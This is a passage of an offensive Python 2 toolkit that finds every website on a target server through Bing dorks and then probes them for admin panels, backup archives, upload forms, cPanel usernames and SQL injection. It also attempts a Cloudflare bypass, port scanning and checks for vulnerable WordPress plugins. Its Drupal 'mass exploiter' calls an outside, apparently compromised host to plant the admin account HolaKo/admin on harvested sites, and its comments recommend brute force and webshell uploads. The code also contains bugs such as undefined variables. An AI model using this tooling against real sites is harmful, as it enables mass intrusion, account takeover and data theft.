                self.getSites(True)
            elif choice == '2' :
                self.getJoomla()
            elif choice == '3' :
                self.getWordpress()
            elif choice == '4' :
                self.findPanels()
            elif choice == '5' :
                self.findZip()
            elif choice == '6' :
                self.findUp()
            elif choice == '7' :
                self.getUsers()
            elif choice == '8' :
                self.grabSqli()
            elif choice == '9' :
                ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ')
                self.portScanner(1, ran)
            elif choice == '10' :
                self.portScanner(2, None)
            elif choice == '11' :
                self.getServerBanner()
            elif choice == '12' :
                self.cloudflareBypasser()
            elif choice == '99' :
                menu()
            con = raw_input(' Continue [Y/n] -> ')
            if con[0].upper() == 'N' :
                exit()
            else :
                clearScr()
                print menuu
    def getSites(self, a) :
        """
        get all websites on same server
        from bing search
        """
        lista = []
        page = 1
        while page <= 101:
            try:
                bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page)
                openbing = urllib2.urlopen(bing)
                readbing = openbing.read()
                findwebs = re.findall('<h2><a href="(.*?)"', readbing)
                for i in range(len(findwebs)):
                    allnoclean = findwebs[i]
                    findall1 = re.findall('http://(.*?)/', allnoclean)
                    for idx, item in enumerate(findall1):
                        if 'www' not in item:
                            findall1[idx] = 'http://www.' + item + '/'
                        else:
                            findall1[idx] = 'http://' + item + '/'
                    lista.extend(findall1)

                page += 50
            except urllib2.URLError:
                pass
        self.sites = unique(lista)
        if a :
            clearScr()
            print '[*] Found ', len(lista), ' Website\n'
            for site in self.sites :
                print site
    def getWordpress(self) :
        """
        get wordpress site using a dork the attacker
        may do a password list attack (i did a tool for that purpose check my pastebin)
        or scan for common vulnerabilities using wpscan for example (i did a simple tool
        for multi scanning using wpscan)
        """
        lista = []
        page = 1
        while page <= 101:
            try:
                bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+?page_id=&count=50&first=" + str(page)
                openbing = urllib2.urlopen(bing)
                readbing = openbing.read()
                findwebs = re.findall('<h2><a href="(.*?)"', readbing)
                for i in range(len(findwebs)):
                    wpnoclean = findwebs[i]
                    findwp = re.findall('(.*?)\?page_id=', wpnoclean)
                    lista.extend(findwp)
                page += 50
            except:
                pass
        lista = unique(lista)
        clearScr()
        print '[*] Found ', len(lista), ' Wordpress Website\n'
        for site in lista :
            print site
    def getJoomla(self) :
        """
        get all joomla websites using
        bing search the attacker may bruteforce
        or scan them
        """
        lista = []
        page = 1
        while page <= 101:
            bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+index.php?option=com&count=50&first=" + str(page)
            openbing = urllib2.urlopen(bing)
            readbing = openbing.read()
            findwebs = re.findall('<h2><a href="(.*?)"', readbing)
            for i in range(len(findwebs)):
                jmnoclean = findwebs[i]
                findjm = re.findall('(.*?)index.php', jmnoclean)
                lista.extend(findjm)
            page += 50
        lista = unique(lista)
        clearScr()
        print '[*] Found ', len(lista), ' Joomla Website\n'
        for site in lista :
            print site
############################
#find admin panels
    def findPanels(self) :
        """
        find panels from grabbed websites
        the attacker may do a lot of vulnerabilty
        tests on the admin area
        """
        print "[~] Finding admin panels"
        adminList = ['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/', 'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site']
        clearScr()
        for site in self.sites :
            for admin in adminList :
                try :
                    if urllib.urlopen(site + admin).getcode() == 200 :
                        print " [*] Found admin panel -> ", site + admin
                except IOError :
                    pass
 ############################
 #find ZIP files
    def findZip(self) :
        """
        find zip files from grabbed websites
        it may contain useful informations
        """
        zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar']
        clearScr()
        print "[~] Finding zip file"
        for site in self.sites :
            for zip1 in zipList :
                try:
                    if urllib.urlopen(site + zip1).getcode() == 200 :
                        print " [*] Found zip file -> ", site + zip1
                except IOError :
                    pass
    def findUp(self) :
        """
        find upload forms from grabbed
        websites the attacker may succeed to
        upload malicious files like webshells
        """
        upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']
        clearScr()
        print "[~] Finding Upload"
        for site in self.sites :
            for up in upList :
                try :
                    if (urllib.urlopen(site + up).getcode() == 200) :
                        html = urllib.urlopen(site + up).readlines()
                        for line in html :
                            if re.findall('type=file', line) :
                                print " [*] Found upload -> ", site+up
                except IOError :
                    pass
    def getUsers(self) :
        """
        get server users using a method found by
        iranian hackers , the attacker may
        do a bruteforce attack on CPanel, ssh, ftp or
        even mysql if it supports remote login
        (you can use medusa or hydra)
        """
        clearScr()
        print "[~] Grabbing Users"
        userslist = []
        for site1 in self.sites :
            try:
                site = site1
                site = site.replace('http://www.', '')
                site = site.replace('http://', '')
                site = site.replace('.', '')
                if '-' in site:
                    site = site.replace('-', '')
                site = site.replace('/', '')
                while len(site) > 2:
                    resp = urllib2.urlopen(site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read()
                    if 'invalid username' not in resp.lower():
                        print '\t [*] Found -> ', site
                        userslist.append(site)
                        break
                    else :
                        print site

                    site = site[:-1]
            except:
                pass

        clearScr()
        for user in userslist :
            print user
    def cloudflareBypasser(self) :
        """
        trys to bypass cloudflare i already wrote
        in my blog how it works, i learned this
        method from a guy in madleets
        """
        clearScr()
        print "[~] Bypassing cloudflare"
        subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']
        for site in self.sites :
            site.replace('http://', '')
            site.replace('/', '')
            try:
                ip = socket.gethostbyname(site)
            except socket.error:
                pass
            for sub in subdoms:
                doo = sub + '.' + site
                print ' [~] Trying -> ', doo
                try:
                    ddd = socket.gethostbyname(doo)
                    if ddd != ip:
                        print ' [*] Cloudflare bypassed -> ', ddd
                        break
                except socket.error :
                    pass
    def getServerBanner(self) :
        """
        simply gets the server banner
        the attacker may benefit from it
        like getting the server side software
        """
        clearScr()
        try:
            s = 'http://' + self.serverip
            httpresponse = urllib.urlopen(s)
            print ' [*] Server header -> ', httpresponse.headers.getheader('server')
        except:
            pass
    def grabSqli(self) :
        """
        just grabs all websites in server with php?id= dork
        for scanning for error based sql injection
        """
        page = 1
        lista = []
        while page <= 101:
            try:
                bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page)
                openbing = urllib2.urlopen(bing)
                readbing = openbing.read()
                findwebs = re.findall('<h2><a href="(.*?)"', readbing)
                for i in range(len(findwebs)):
                    x = findwebs[i]
                    lista.append(x)
            except:
                pass
            page += 50
        lista = unique(lista)
        self.checkSqli(lista)
    def checkSqli(self, s):
        """
        checks for error based sql injection,
        most of the codes here are from webpwn3r
        project the one who has found an lfi in
        yahoo as i remember, you can find a separate
        tool in my blog
        """
        clearScr()
        print "[~] Checking SQL injection"
        payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]
        check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I)
        for url in s:
            try:
                for param in url.split('?')[1].split('&'):
                    for payload in payloads:
                        power = url.replace(param, param + payload.strip())
                        #print power
                        html = urllib2.urlopen(power).readlines()
                        for line in html:
                            checker = re.findall(check, line)
                            if len(checker) != 0 :
                                print ' [*] SQLi found -> ', power
            except:
                pass
    def portScanner(self, mode, ran) :
        """
        simple port scanner works with range of ports
        or with common ports (al-swisre idea)
        """
        clearScr()
        print "[~] Scanning Ports"
        def do_it(ip, port):
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            #sock.settimeout(5)
            sock = sock.connect_ex((ip,port))
            if sock == 0:
                print " [*] Port %i is open" % port

        if mode == 1 :
            a = ran.split('-')
            start = int(a[0])
            end = int(a[1])
            for i in range(start, end):
                do_it(self.serverip, i)
        elif mode == 2 :
            for port in [80,21,22,2082,25,53,110,443,143] :
                # didn't use multithreading cos it's few ports
                do_it(self.serverip, port)
############################
minu ='''
\t 1: Drupal Bing Exploiter
\t 2: Get Drupal Websites
\t 3: Drupal Mass Exploiter
\t 99: Back To Main Menu
'''


            #Definition Of Drupal Bing Expoliter
def drupal():

    '''Drupal Exploit Binger All Websites Of server '''
    ip  = raw_input('1- IP : ')
    page  = 1
    while page <= 50 :

      url   = "http://www.bing.com/search?q=ip%3A"+ip+"&go=Valider&qs=n&form=QBRE&pq=ip%3A"+ip+"&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first="+str(page)
      req   = urllib2.Request(url)
      opreq = urllib2.urlopen(req).read()
      findurl = re.findall('<div class="b_title"><h2><a href="(.*?)" h=',opreq)
      page += 1

      for url in findurl :
        try :

                        urlpa = urlparse(url)
                        site  = urlpa.netloc

                        print "[+] Testing At "+site
                        resp = urllib2.urlopen('http://crig-alda.ro/wp-admin/css/index2.php?url='+site+'&submit=submit')
                        read=resp.read()
                        if "User : HolaKo" in read:
                           print "Exploit found =>"+site

                           print "user:HolaKo\npass:admin"
                           a = open('up.txt','a')
                           a.write(site+'\n')
                           a.write("user:"+user+"\npass:"+pwd+"\n")
                        else :
                           print "[-] Expl Not Found :( "

        except Exception as ex :
                       print ex
                       sys.exit(0)


            #Drupal Server ExtraCtor
def getdrupal():
    ip  = raw_input('Enter The Ip : ')
    page  = 1
    sites = list()
    while page <= 50 :

      url   = "http://www.bing.com/search?q=ip%3A"+ip+"+node&go=Valider&qs=ds&form=QBRE&first="+str(page)
      req   = urllib2.Request(url)
      opreq = urllib2.urlopen(req).read()
      findurl = re.findall('<div class="b_title"><h2><a href="(.*?)" h=',opreq)
      page += 1

      for url in findurl :
                             split = urlparse(url)
                             site   = split.netloc
                             if site not in sites :
                                      print site
                                      sites.append(site)


            #Drupal Mass List Exploiter
def drupallist():
    listop = raw_input("Enter The list Txt :")
    fileopen = open(listop,'r')
    content = fileopen.readlines()
    for i in content :
        url=i.strip()
        try :
            openurl = urllib2.urlopen('http://crig-alda.ro/wp-admin/css/index2.php?url='+url+'&submit=submit')
            readcontent = openurl.read()
            if  "Success" in readcontent :
                print "[+]Success =>"+url
                print "[-]username:HolaKo\n[-]password:admin"
                save = open('drupal.txt','a')
                save.write(url+"\n"+"[-]username:HolaKo\n[-]password:admin\n")

            else :
                print i + "=> exploit not found "
        except Exception as ex :
            print ex
def maine():

     print minu
     choose = raw_input("choose a number :")
     while True :

      if choose == "1":
        drupal()
      if choose == "2":
        getdrupal()
      if choose == "3":
        drupallist()
      if choose == "4":
        about()
      if choose == "99":
            menu()
      con = raw_input('Continue [Y/n] -> ')
      if con[0].upper() == 'N' :
                                    exit()
      if con[0].upper() == 'Y' :
                                    maine()
def unique(seq):
    seen = set()
    return [seen.add(x) or x for x in seq if x not in seen]
def bing_all_grabber(s):
    lista = []
    page = 1
    while page <= 101:
        try:
            bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page)
            openbing = urllib2.urlopen(bing)
            readbing = openbing.read()
            findwebs = re.findall('<h2><a href="(.*?)"', readbing)
            for i in range(len(findwebs)):
                allnoclean = findwebs[i]
                findall1 = re.findall('http://(.*?)/', allnoclean)
                for idx, item in enumerate(findall1):
                    if 'www' not in item:
                        findall1[idx] = 'http://www.' + item + '/'
                    else:
                        findall1[idx] = 'http://' + item + '/'
                lista.extend(findall1)

            page += 50
        except urllib2.URLError:
            pass

    final = unique(lista)
    return final
def check_wordpress(sites) :
    wp = []
    for site in sites :
        try :
            if urllib2.urlopen(site+'wp-login.php').getcode() == 200 :
                wp.append(site)
        except :
            pass

    return wp
def check_joomla(sites) :
    joomla = []
    for site in sites :
        try :
            if urllib2.urlopen(site+'administrator').getcode() == 200 :
                joomla.append(site)
        except :
            pass

    return joomla
def wppjmla():

    ipp = raw_input('Enter Target IP: ')
    sites = bing_all_grabber(str(ipp))
    wordpress = check_wordpress(sites)
    joomla = check_joomla(sites)
    for ss in wordpress :
        print ss
    print '[+] Found ! ', len(wordpress), ' Wordpress Websites'
    print '-'*30+'\n'
    for ss in joomla :
        print ss


    print '[+] Found ! ', len(joomla), ' Joomla Websites'

    print '\n'
#initialise the tnscan function
class tnn():
    def __init__(self):
        clearScr()
        aaa = raw_input("Target IP : ")
        TNscan(aaa)
############################
def grabsqli(ip):
    try :
        print bcolors.OKBLUE  + "Check_Uplaod... "
        print '\n'

        page = 1
        while page <= 21:
                bing = "http://www.bing.com/search?q=ip%3A"+ip+"+upload&count=50&first="+str(page)
                openbing  = urllib2.urlopen(bing)
                readbing = openbing.read()
                findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
                sites = findwebs
                for i in sites :
                            try :
                                      response = urllib2.urlopen(i).read()
                                      checksqli(i)
                            except urllib2.HTTPError, e:
                                       str(sites).strip(i)

                page = page + 10
    except :
         pass
def checksqli(sqli):
                            responsetwo = urllib2.urlopen(sqli).read()
                            find = re.findall('type="file"',responsetwo)
                            if find:
                                            print(" Found ==> " + sqli)
def sqlscan():
    ip = raw_input('Enter IP : ')
    grabsqli(ip)
# found this code on stackoverflow.com/questions/19278877
def unique(seq):
    seen = set()
    return [seen.add(x) or x for x in seq if x not in seen]
def bing_all_grabber(s):
    lista = []
    page = 1
    while page <= 101:
        try:
            bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page)
            openbing = urllib2.urlopen(bing)
            readbing = openbing.read()
            findwebs = re.findall('<h2><a href="(.*?)"', readbing)
            for i in range(len(findwebs)):
                allnoclean = findwebs[i]
                findall1 = re.findall('http://(.*?)/', allnoclean)
                for idx, item in enumerate(findall1):
                    if 'www' not in item:
                        findall1[idx] = 'http://www.' + item + '/'
                    else:
                        findall1[idx] = 'http://' + item + '/'
                lista.extend(findall1)

            page += 50
        except urllib2.URLError:
            pass

    final = unique(lista)
    return final
def check_wordpress(sites) :
    wp = []
    for site in sites :
        try :
            if urllib2.urlopen(site+'wp-login.php').getcode() == 200 :
                wp.append(site)
        except :
            pass

    return wp
def check_wpstorethemeremotefileupload(sites) :
    wpstorethemeremotefileupload = []
    for site in sites :
        try :
            if urllib2.urlopen(site+'wp-content/themes/WPStore/upload/index.php').getcode() == 200 :
                wpstorethemeremotefileupload.append(site)
        except :
            pass

    return wpstorethemeremotefileupload
def check_wpcontactcreativeform(sites) :
    wpcontactcreativeform = []
    for site in sites :
        try :
            if urllib2.urlopen(site+'wp-content/plugins/sexy-contact-form/includes/fileupload/index.php').getcode() == 200 :
                wpcontactcreativeform.append(site)
        except :
            pass

    return wpcontactcreativeform
def check_wplazyseoplugin(sites) :
    wplazyseoplugin = []
    for site in sites :
        try :
            if urllib2.urlopen(site+'wp-content/plugins/lazy-seo/lazyseo.php').getcode() == 200 :
                wplazyseoplugin.append(site)
        except :
            pass

    return wplazyseoplugin
def check_wpeasyupload(sites) :
    wpeasyupload = []
    for site in sites :
        try :
            if urllib2.urlopen(site+'wp-content/plugins/easy-comment-uploads/upload-form.php').getcode() == 200 :
                wpeasyupload.append(site)
        except :
            pass

    return wpeasyupload
def check_wpsymposium(sites) :
    wpsymposium = []
    for site in sites :
        try :
            if urllib2.urlopen(site+'wp-symposium/server/file_upload_form.php').getcode() == 200 :
                wpsycmium.append(site)
        except :
            pass

    return wpsymposium
def wpminiscanner():
    ip = raw_input('Enter IP : ')
    sites = bing_all_grabber(str(ip))
    wordpress = check_wordpress(sites)
    wpstorethemeremotefileupload = check_wpstorethemeremotefileupload(sites)
    wpcontactcreativeform = check_wpcontactcreativeform(sites)
    wplazyseoplugin = check_wplazyseoplugin(sites)
    wpeasyupload = check_wpeasyupload(sites)
    wpsymposium = check_wpsymposium(sites)
    for ss in wordpress :
        print ss
    print '[*] Found, ', len(wordpress), ' wordpress sites.'
    print '-'*30+'\n'
    for ss in wpstorethemeremotefileupload  :
        print ss
    print '[*] Found, ', len(wpstorethemeremotefileupload), ' wp_storethemeremotefileupload exploit.'
    print '-'*30+'\n'
    for ss in wpcontactcreativeform  :
        print ss
    print '[*] Found, ', len(wpcontactcreativeform), ' wp_contactcreativeform exploit.'
    print '-'*30+'\n'
    for ss in wplazyseoplugin  :
        print ss
    print '[*] Found, ', len(wplazyseoplugin), ' wp_lazyseoplugin exploit.'
    print '-'*30+'\n'
    for ss in wpeasyupload  :
        print ss
    print '[*] Found, ', len(wpeasyupload), ' wp_easyupload exploit.'
    print '-'*30+'\n'
    for ss in wpsymposium :
        print ss


    print '[*] Found, ', len(wpsymposium), ' wp_sympsiup exploit.'

    print '\n'
############################
#begin :D
if __name__ == "__main__":
    menu()